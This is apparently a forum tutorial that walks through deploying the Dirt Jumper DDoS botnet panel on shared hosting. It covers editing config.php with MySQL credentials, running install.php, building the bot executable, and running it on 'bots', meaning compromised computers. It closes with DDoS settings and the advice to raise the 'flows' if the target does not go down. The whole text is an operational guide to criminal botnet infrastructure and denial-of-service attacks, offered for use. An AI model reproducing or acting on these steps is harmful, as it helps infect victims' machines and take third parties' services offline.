What you will need:
1. A simple C-panel shared hosting account will work. If you plan on hosting a lot of bots i suggest a Vps with decent specs.
2. A domain. Can be acquired for free at co.com
Preparing your domain and web hosting.
If you have setup a website before you will not need this part.
Setting up Dirt Jumper
Step 1: Upload the file djadmin.zip to your home directory, and Extract the file.
When you are done open up the djadmin folder and it should look like this.
Step 2: Edit config.php (Skip this if you are experienced with MySQL databases.)
$dbuname="Mysql Database user name here.";
$dbname="Mysql Database name here";
$dbpass="Mysql Database password here";
$login="Admin user name (Anything you want)";
$password="Admin password (Anything you want)";
if ($sokol=="1") {
mysql_connect($dbhost, $dbuname, $dbpass) or include"404.php";
} else {
i. You can create a database by going to the main control panel page, scroll down and click MySQL Databases.
Name your database "dj" (or what ever you want) click create database. Your database name will look something like this. "something_dj".
You can find the name of your Database where you created it.
ii. Making a MySQL user. Further down the page find the add user section. Add a user with what ever name you want i used the name "user" and put in a password you will remember.
iii. Finally you are going to need to grant the user access to the MySQL database.
Scroll down to the "Add User To Database" section, click add.
It will ask you what permissions you would like to give the user select all of them.
iv. Now that you know what your MySQL database name, user, and password is finish filling in this part of the config file.
Quote:$dbuname="Mysql Database user name here.";
$dbname="Mysql Database name here";
$dbpass="Mysql Database password here";
Quote:$login="Admin user name (Anything you want)";
$password="Admin password (Anything you want)";
The username and password you put here will be the loggin for the Dirt Jumper panel.
Step 3: Once you have filled out the config file hit save.
Then go to your domain/ip.com/djadmin/install.php
If you setup everything correctly you will be re-directed to the admin panel.
Loggin using the credentials you specified in the config file.
Quote:$login="Admin user name (Anything you want)";
$password="Admin password (Anything you want)";
Step 4: Open up the builder, input yourdomain.com/djadmin/ and hit build.
Step 5: Download and execute the built file on some bots and they should appear on your panel.
To ddos input the domain you wish to ddos or if you wish to ddos an ip put in
The amount of flows = how much power. I suggest around 30-60. Although if the target still isn't going down bring it up :) Be careful though to much and you can kill your bots or make them turn off there computer.
Hit save and start and there you go let the ddosing begin :)
Thanks for reading !!!
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